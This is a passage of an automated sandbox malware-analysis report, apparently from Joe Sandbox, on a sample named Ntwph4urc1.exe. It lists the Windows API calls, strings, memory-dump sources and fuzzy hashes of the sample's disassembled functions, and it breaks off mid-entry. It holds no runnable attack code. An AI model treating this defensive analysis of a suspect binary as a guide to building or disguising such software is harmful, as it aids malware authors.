                                            • GlobalFree.KERNEL32(?), ref: 004051F8
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405271
                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040531A
                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405329
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00405353
                                            • ShowWindow.USER32(?,00000000), ref: 004053A1
                                            • GetDlgItem.USER32(?,000003FE), ref: 004053AC
                                            • ShowWindow.USER32(00000000), ref: 004053B3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 2564846305-813528018
                                            • Opcode ID: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                            • Instruction ID: 7baa9a5517a4605733e15ddb68db2cf5b5f1e79b3ae63259faab1fa91bacf49a
                                            • Opcode Fuzzy Hash: 395346f0b34cdab504ac547572c6f4c5f93574bb04bab85a4e8054be4462e8f7
                                            • Instruction Fuzzy Hash: 24127A70900609EFDB20CF65CC45AAF7BB5FB85314F10817AEA10BA2E1DB798951DF58
                                            APIs
                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045A1
                                            • GetDlgItem.USER32(?,000003E8), ref: 004045B5
                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045D2
                                            • GetSysColor.USER32(?), ref: 004045E3
                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004045F1
                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004045FF
                                            • lstrlenW.KERNEL32(?), ref: 00404604
                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404611
                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404626
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040467F
                                            • SendMessageW.USER32(00000000), ref: 00404686
                                            • GetDlgItem.USER32(?,000003E8), ref: 004046B1
                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004046F4
                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404702
                                            • SetCursor.USER32(00000000), ref: 00404705
                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040471E
                                            • SetCursor.USER32(00000000), ref: 00404721
                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404750
                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404762
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: Call$N$zD@
                                            • API String ID: 3103080414-4182535457
                                            • Opcode ID: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                            • Instruction ID: a130e1d57a17a91ade9f3fb54c611fa5fc44c03720afd6b67d12dead6e9fe9b9
                                            • Opcode Fuzzy Hash: edd6e1ed575ff481441806d0cdfc4cc3cbf57af2bc668ca3fdfe935b7b56bb3e
                                            • Instruction Fuzzy Hash: 3D6181B1900209BFDB10AF60DD85E6A7BA9FB85354F00803AFB05B72D1C778A951CF99
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061D5,?,?), ref: 00406075
                                            • GetShortPathNameW.KERNEL32(?,007A55E8,00000400), ref: 0040607E
                                              • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E59
                                              • Part of subcall function 00405E49: lstrlenA.KERNEL32(00000000,?,00000000,0040612E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E8B
                                            • GetShortPathNameW.KERNEL32(?,007A5DE8,00000400), ref: 0040609B
                                            • wsprintfA.USER32 ref: 004060B9
                                            • GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 004060F4
                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406103
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040613B
                                            • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 00406191
                                            • GlobalFree.KERNEL32(00000000), ref: 004061A2
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A9
                                              • Part of subcall function 00405EE4: GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                              • Part of subcall function 00405EE4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %ls=%ls$[Rename]$Uz$]z$]z
                                            • API String ID: 2171350718-2304911260
                                            • Opcode ID: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                            • Instruction ID: 03fe7b931bffc2b02635af9c10f4e714808f3729e90155368a1b4a6ed52067ca
                                            • Opcode Fuzzy Hash: 0ed23fd09f20e9f0b0e4ce5e0ebdd9c0c92abb0a06c9999cd82c312b58dee0fa
                                            • Instruction Fuzzy Hash: 44312370600B05BFD6206B618D48F6B3A6CDF86744F15013AFD42FA2C3DA3C99218ABD
                                            APIs
                                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                            • Instruction ID: d956376f91ba3d110af617c57d1628f0fb3f6748c3ab60faf4ed9a16e53922cc
                                            • Opcode Fuzzy Hash: 88f198494482b5c6c442ae986b6c1e2dc60a71cbe67cc352e3a5a4066e9850df
                                            • Instruction Fuzzy Hash: 78418B71800209AFCF058FA5CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                            APIs
                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                            • CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                            • CharNextW.USER32(?,00000000,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                            • CharPrevW.USER32(?,?,771B3420,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Ntwph4urc1.exe",0040347D,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                            Strings
                                            • "C:\Users\user\Desktop\Ntwph4urc1.exe", xrefs: 0040669D
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040669E
                                            • *?|<>/":, xrefs: 004066EF
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\Ntwph4urc1.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                            • API String ID: 589700163-2297971204
                                            • Opcode ID: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                            • Instruction ID: 12c80e2bf748d1a62cb3884e1ae38c2d534281e125f75e63bd15dfe73c9398b2
                                            • Opcode Fuzzy Hash: 9ddbb9e18cbe24282ce487244f484090ca5dfb24375496ba9be4fccf49263134
                                            • Instruction Fuzzy Hash: E711EB15800A1255DB303B148C84A7763F8EF947A4F56443FED86732C0E77D4C9286BD
                                            APIs
                                            • GetWindowLongW.USER32(?,000000EB), ref: 004043C8
                                            • GetSysColor.USER32(00000000), ref: 00404406
                                            • SetTextColor.GDI32(?,00000000), ref: 00404412
                                            • SetBkMode.GDI32(?,?), ref: 0040441E
                                            • GetSysColor.USER32(?), ref: 00404431
                                            • SetBkColor.GDI32(?,?), ref: 00404441
                                            • DeleteObject.GDI32(?), ref: 0040445B
                                            • CreateBrushIndirect.GDI32(?), ref: 00404465
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                            • Instruction ID: 7fe0b9bd09f79c55d2aa0e3576d5328f94b18663b05207f77db8afc097fd36db
                                            • Opcode Fuzzy Hash: 288dbcc7c85f11a55b3e08142a2a7aff64d3670202badf385cb57de10b60d8c1
                                            • Instruction Fuzzy Hash: F62174B15007049BCB319F78D948F5BBBF8AF80714B048A3EE9D2A26E1C734E905CB58
                                            APIs
                                            • ReadFile.KERNEL32(?,?,?,?), ref: 00402750
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4
                                              • Part of subcall function 00405FC5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026C9,00000000,00000000,?,00000000,00000011), ref: 00405FDB
                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                            • String ID: 9
                                            • API String ID: 163830602-2366072709
                                            • Opcode ID: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                            • Instruction ID: d74bd8ffb6d519048d690203a29de729842be89db78b0864c200dffe12222895
                                            • Opcode Fuzzy Hash: 9ec651210d820e9b24df916f481368169d6e1ca8bc1240ea0af3f2247977670f
                                            • Instruction Fuzzy Hash: 1451F875D00219ABDF20DF95CA89AAEBB79FF04304F10817BE501B62D0E7B49D82CB58
                                            APIs
                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D1A
                                            • GetMessagePos.USER32 ref: 00404D22
                                            • ScreenToClient.USER32(?,?), ref: 00404D3C
                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D4E
                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D74
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1842919653.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                             • Associated: 00000005.00000002.1842895422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842950813.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1842978149.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                             • Associated: 00000005.00000002.1843601762.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                            • Instruction ID: 46b4da8a0d4c37396bcf421d2915c418c0d79b1a62bcd48facf8de7c649397b3
                                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                            • Instruction Fuzzy Hash: 80015E7190021DBADB00DBA4DD85FFEBBBCAF54711F10012BBB50B61D0DBB4AA058BA5
                                            APIs
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,74352238,?,00000808), ref: 74351635
                                            • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,74352238,?,00000808), ref: 7435163C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,74352238,?,00000808), ref: 74351650
                                            • GetProcAddress.KERNEL32(8"5t,00000000), ref: 74351657
                                            • GlobalFree.KERNEL32(00000000), ref: 74351660
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1895645572.0000000074351000.00000020.00000001.01000000.00000005.sdmp, Offset: 74350000, based on PE: true
                                             • Associated: 00000005.00000002.1895373883.0000000074350000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896009053.0000000074354000.00000002.00000001.01000000.00000005.sdmp
                                             • Associated: 00000005.00000002.1896032502.0000000074356000.00000002.00000001.01000000.00000005.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_74350000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                            • String ID: 8"5t
                                            • API String ID: 1148316912-3662408271
                                            • Opcode ID: e7fbe865b06c8a90d60b6aa680a5ef9cc1424109877fd00cfecf8bf80557c533
                                            • Instruction ID: d9ea7dac467b88fe13b5c9e3c9ead21232fe8486686915842501c5b11e36065b
                                            • Opcode Fuzzy Hash: e7fbe865b06c8a90d60b6aa680a5ef9cc1424109877fd00cfecf8bf80557c533
                                            • Instruction Fuzzy Hash: 74F0F87325A1387BA62016B78C48EEBFE9CDF9F2F5B310211F62C9219186614C0197F1
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402F49
                                            • MulDiv.KERNEL32(0006AB66,00000064,0006AD6A), ref: 00402F74
                                            • wsprintfW.USER32 ref: 00402F84
                                            • SetWindowTextW.USER32(?,?), ref: 00402F94
                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402FA6
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402F7E
                                            Memory Dump Source
